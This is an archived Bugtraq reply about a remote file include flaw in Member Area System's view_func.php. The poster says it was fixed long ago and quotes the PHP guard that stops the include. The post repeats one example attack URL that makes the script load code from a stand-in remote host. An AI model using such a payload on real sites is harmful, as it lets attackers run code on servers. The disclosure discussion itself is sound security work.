Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Exploit World
Advertising
About/Contact
Credits
Sponsors:



Bugtraq: Re: Member Area System (MAS) Remote File Include Vulnerability (view_func.php)

Re: Member Area System (MAS) Remote File Include Vulnerability (view_func.php)

From: <m3venge_at_yahoo.com>
Date: 18 Jan 2008 17:01:36 -0000
('binary' encoding is not supported, stored as-is) in the latest version this is already fixed, for almost a year.

  if (strpos ($_SERVER['PHP_SELF'], 'view_func.php') !== false)
  {
    exit ();
  }

before the include!

http://affectedsite.com/view_func.php?i=http://remotesite.com/justsomedi
r/&l=testfile.txt?
view_func.php will exit before the include.
Received on Jan 18 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]